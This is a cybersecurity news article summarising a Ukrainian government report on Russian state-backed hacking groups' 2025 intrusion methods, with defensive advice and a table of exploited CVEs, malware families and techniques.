Russian state-sponsored threat groups significantly stepped up their cyber operations in 2025, using a range of methods to break into targeted systems.
From exploiting remote desktop tools and virtual private networks to manipulating trusted supply chains and deceiving employees through social engineering, these actors have built a dangerous and versatile toolkit for gaining initial access.
The attacks are not random. They are well-planned, persistent campaigns aimed at government bodies, defense organizations, energy infrastructure, and other critical sectors, particularly in Ukraine and across Europe.
Threat actors under designations such as UAC-0002 (Sandworm), UAC-0001 (APT28), UAC-0010 (Gamaredon), and UAC-0190 (Void Blizzard) have each played an active role throughout the year.
Analysts from the National Security and Defense Council of Ukraine said in a report shared with Cyber Security News (CSN) that they identified that in 2025, the volume and complexity of these attacks grew considerably, with CERT-UA recording approximately 5,927 cyber incidents, a 37.4% rise compared to 2024.
The report confirms that RDP exploitation, VPN vulnerabilities, and phishing through platforms like Signal, WhatsApp, and Telegram are among the most common methods used to gain a foothold inside targeted networks.
The consequences of these breaches extend beyond data theft. Several intrusions led to the deployment of destructive wiper malware, ransomware, and long-running espionage tools designed to silently collect and exfiltrate sensitive information.
The scale of this activity signals that these groups operate not just as cybercriminals but as instruments of a broader geopolitical strategy.
In at least one case, attackers used stolen credentials purchased from access brokers on darknet forums to move directly into targeted environments. This approach cuts the time between initial access and active exploitation, bypassing traditional phishing entirely.
RDP, VPN, and Supply Chain as Entry Points
Remote Desktop Protocol remains one of the most abused entry vectors in 2025. Groups including UAC-0238 exploited exposed RDP services to push ransomware variants such as X2anylock, Warlock, and LockBit 3.0 into compromised environments.
VPN appliances were targeted through vulnerabilities including CVE-2025-20333 and CVE-2025-20362, giving attackers a direct tunnel into internal networks.
Supply chain intrusions added another serious layer of risk. Actors targeted software update mechanisms, third-party tools, and IT service providers to plant backdoors where scrutiny is typically lower. Once inside, groups deployed malware families like Remcos RAT, DarkCrystal RAT, XWorm, and Lumma Stealer to maintain persistent access.
Vulnerabilities in widely used platforms were also exploited, including flaws in Roundcube (CVE-2024-42009, CVE-2025-49113), Fortinet appliances (CVE-2024-55591, CVE-2024-21762), and archiving tools like WinRAR and 7-Zip.
Older Microsoft Office flaws (CVE-2017-11882, CVE-2017-0199) that remain unpatched in many organizations were also leveraged, proving legacy vulnerabilities still carry very real consequences.
Payloads arrived through file types including SVG, PNG, LNK, JS, and HTA files, often hosted on legitimate services like Dropbox, Google Drive, and Cloudflare Tunnels to bypass network defenses.
Living off the Land techniques using built-in tools such as PowerShell, certutil, mshta.exe, and rundll32 helped attackers blend into normal system activity and evade detection.
Social Engineering and Phishing Campaigns
Social engineering remained one of the most reliable methods Russian threat groups used to break in during 2025.
Phishing lures were sent through email platforms including Microsoft O365, Roundcube, and Zimbra, as well as messaging apps like Signal, WhatsApp, and Telegram.
Techniques such as ClickFix, fake CAPTCHA prompts, and PowerShell-based execution tricks helped attackers deliver malware without triggering immediate alerts.
OAuth phishing, Device Code phishing targeting Microsoft Teams, and App-Specific Password phishing against Google accounts were observed targeting over a thousand individuals.
QR-code session hijacking through a method called GhostPairing was also deployed, and fake Android APK files spread outside Google Play to infect devices with tools including CamelSpy.
To counter these threats, organizations are advised to enforce multi-factor authentication, adopt Zero Trust architecture, and use Protective DNS to block malicious domains.
Patch management across both new and legacy vulnerabilities is essential, and staff should receive regular training to spot social engineering attempts.
Security teams should restrict RDP access and monitor for unusual use of built-in system tools that attackers frequently repurpose.
Indicators of Compromise (IoCs):-
| Type | Indicator | Description |
|---|---|---|
| CVE | CVE-2025-20333 | Cisco ASA/AnyConnect VPN vulnerability used for initial access |
| CVE | CVE-2025-20362 | Cisco ASA/AnyConnect VPN vulnerability used for initial access |
| CVE | CVE-2024-42009 | Roundcube webmail vulnerability exploited by Russian APT groups |
| CVE | CVE-2024-37383 | Roundcube webmail vulnerability exploited in campaigns |
| CVE | CVE-2025-49113 | Roundcube webmail vulnerability used in 2025 campaigns |
| CVE | CVE-2025-48700 | Roundcube webmail vulnerability exploited in 2025 |
| CVE | CVE-2024-55591 | Fortinet appliance vulnerability exploited for initial access |
| CVE | CVE-2024-21762 | Fortinet appliance vulnerability exploited for initial access |
| CVE | CVE-2025-24472 | Fortinet appliance vulnerability exploited for initial access |
| CVE | CVE-2017-11882 | Legacy Microsoft Office flaw still actively exploited |
| CVE | CVE-2017-0199 | Legacy Microsoft Office flaw still actively exploited |
| CVE | CVE-2025-6218 | WinRAR vulnerability used by Gamaredon/Sandworm/RomCom |
| CVE | CVE-2025-8088 | WinRAR vulnerability used by UAC-0180 (RomCom) |
| CVE | CVE-2025-0411 | 7-Zip vulnerability exploited by UAC-0006 |
| CVE | CVE-2024-38213 | Exploited by Sandworm (UAC-0212) |
| CVE | CVE-2025-43300 | Apple iOS/macOS vulnerability |
| CVE | CVE-2025-49844 | Redis vulnerability (1010 instances targeted) |
| CVE | CVE-2025-49090 | Matrix platform vulnerability |
| CVE | CVE-2025-54315 | Matrix platform vulnerability |
| Malware | Remcos RAT | Remote access trojan used for persistent access |
| Malware | DarkCrystal RAT | Remote access trojan deployed post-compromise |
| Malware | XWorm | Malware used in multiple Russian-linked campaigns |
| Malware | Lumma Stealer | Credential and data stealer deployed by multiple groups |
| Malware | LameHug | Malware used by UAC-0001 (APT28) |
| Malware | HomeSteel | Data exfiltration tool targeting Ukrainian organizations |
| Malware | WreckSteel | Destructive/exfiltration malware in 2025 campaigns |
| Malware | FileMess | Malware used in Ukrainian-targeted campaigns |
| Malware | GiftedCrook | Stealer targeting VPN credentials and Telegram data |
| Malware | CamelSpy | Android spyware distributed via fake APKs |
| Malware | ZEROLOT | Wiper malware linked to Sandworm |
| Malware | PathWiper | Wiper malware targeting Ukrainian organizations |
| Malware | Sting | Malware deployed by Sandworm in 2025 |
| Malware | Snake Keylogger | Keylogger deployed in phishing-based campaigns |
| Malware | PicassoLoader | Loader used by UAC-0057 (Ghostwriter) |
| Malware | SmokeLoader | Loader malware used in multiple campaigns |
| Malware | NetSupport RAT | Legitimate RMM tool abused as malware |
| Malware | Pterodo | Backdoor associated with UAC-0010 (Gamaredon) |
| Malware | AgentTesla | Credential-stealing malware used in phishing campaigns |
| Malware | FormBook | Infostealer deployed via phishing |
| Malware | Rhadamanthys | Stealer malware distributed in 2025 campaigns |
| Malware | RedLine | Credential stealer observed in 2025 campaigns |
| Malware | LokiBot | Infostealer deployed via legacy Office exploit chains |
| Malware | X2anylock | Ransomware variant pushed via RDP exploitation |
| Malware | Warlock | Ransomware variant used by UAC-0238 |
| Technique | GhostPairing | QR-code based account hijacking technique |
| Technique | ClickFix | Social engineering trick used to execute malicious scripts |
| Technique | Device Code Phishing | OAuth/device code abuse targeting Microsoft 365 |
| Tool | Cloudflare Tunnels | Abused for C2 communication and payload hosting |
| Tool | Telegram | Used as C2 channel by UAC-0010 and others |
| Tool | Telegraph | Used for IP-based C2 routing by UAC-0010 |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
